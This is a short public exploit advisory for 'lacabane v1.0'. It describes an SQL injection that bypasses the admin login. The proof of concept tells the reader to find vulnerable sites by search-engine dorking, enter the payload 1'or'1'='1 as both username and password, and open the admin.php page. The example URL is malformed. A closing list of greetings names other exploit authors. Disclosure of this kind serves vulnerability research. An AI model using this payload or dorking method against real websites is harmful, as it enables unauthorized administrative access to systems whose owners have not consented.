Authored by indoushka

Lacabane version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

| # Title : lacabane v1.0 Auth by pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : |

poc :

[+] Dorking İn Google Or Other Search Enggine

[+] use payload in user & pass : 1'or'1'='1

[+] http://lacabanedesloupiots127.0.0.1com/admin.php

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas**LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |